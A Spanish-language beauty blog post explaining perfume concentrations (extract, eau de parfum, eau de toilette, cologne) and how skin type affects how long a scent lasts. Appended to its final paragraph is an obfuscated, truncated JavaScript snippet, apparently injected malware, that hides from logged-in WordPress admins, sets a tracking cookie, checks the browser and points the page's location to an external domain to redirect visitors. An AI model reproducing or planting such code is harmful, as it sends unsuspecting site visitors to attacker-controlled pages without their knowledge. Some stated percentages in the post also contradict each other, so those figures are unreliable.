¿Cuál elegir? Para el día o para la noche, para una ocasión especial, para sorprender…

Todas las fragancias, se decriben en forma piramidal, esto quiere decir que tienen notas de fondo, de corazón y de salida que varían en función del tiempo que la fragancia se mantiene en nuestra piel y va dejando distintas notas así como van pasando las horas.

 

Quiero decir que, cuando vaporizamos una fragancia, a veces nos puede parecer fuerte o con mucho carácter cuando la probamos, pero si esperamos un tiempo, nos demuestra que hay notas que no habíamos olido en un principio, y que hay otras que olimos anteriormente y que ya son casi imperceptibles. Curioso… ¿verdad?

 

Esto se debe a 2que, cada componente que contiene el perfume, tiene un tiempo máximo de evaporación.

Las concentraciones más usuales o comunes en las que se fabrican las fragancias son estas:

Perfume o extracto de perfume:

Este es el que tiene más concentración de esencia y normalmente se presenta en frascos pequeños de 7 ml o 10 ml. Estos frascos, no suelen tener vaporizador y se presentan exclusivamente para aplicarlo con su tapón. Perdura muchas horas en la piel ya que su porcentaje de esencia está entre un 20 y un 40%. No os tengo que decir, que tenemos que aplicarnos poquísima cantidad y siempre en puntos estratégicos como pueden ser las muñecas, detrás de los lóbulos de las orejas o detrás de las rodillas.

Eau de Parfum (Agua de perfume):

Con la misma fórmula que la anterior, pero menos concentrada en esencia. En este caso, el porcentaje en esencia es de entre un 10 y un 20%. Su durabilidad, es un poco menos que en el extracto. Tendremos que aplicar más cantidad y estos frascos, sí que se presentan con vaporizador. Esta concentración es una de las más habituales, si bien todas las fragancias no fabrican en las tres concentraciones, ya que a veces encontramos una fragancia solo en edp, solo en edt o solo en edc.

Eau de Toilette (Agua de tocador):

Esta vez, encontramos una versión más ligera. La concentración de esencia es menor. Entre un 3 y un 5%. Es la que la mayoría elige para esos momentos especiales… Ojo! podemos encontrar en el mercado aguas de toilette que nos puedas resultar mucho más intensas que alguna Eau de Parfum, pero esto se debe a las materas primas que contiene. Por ejemplo, las fragancias que contienen esencias derivadas de la madera, son más intensas que por ejemplo, las creadas a partir de algún componente cítrico o floral. Con lo cual, que sea un extracto o un eau de parfum  no quiere decir que se más intensa, simplemente que perdura más en la piel.

Y nos queda solamente las aguas de colonia:

Son las más ligeras y refrescantes ya que son menos concentradas. Estas tienen entre un 3 y un 5% de esencia y son las que contienen más porcentaje de alcohol. Obviamente, hay que aplicar más cantidad que en el caso de las anteriores y no perduran tanto. Si bien son nuestras preferidas en época estival y para emplearlas a diario.

Antes de terminar, voy a hacer un inciso. El perfume, al entrar en contacto con nuestra piel, se convierte en un olor único y personal, por eso a veces notamos diferente una fragancia que llevan dos personas y a ninguna de ellas le huele igual. Así como no todas las fragancias perduran las mismas horas en la piel, también hay pieles que retienen durante más tiempo los aromas. Por regla general, las pieles grasas son ideales porque el perfume perdura más tiempo ya que el PH de una piel grasa es mayor. Por el contrario, las pieles secas son menos perceptivas y tienen el inconveniente de que el aroma no perdura tanto tiempo. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone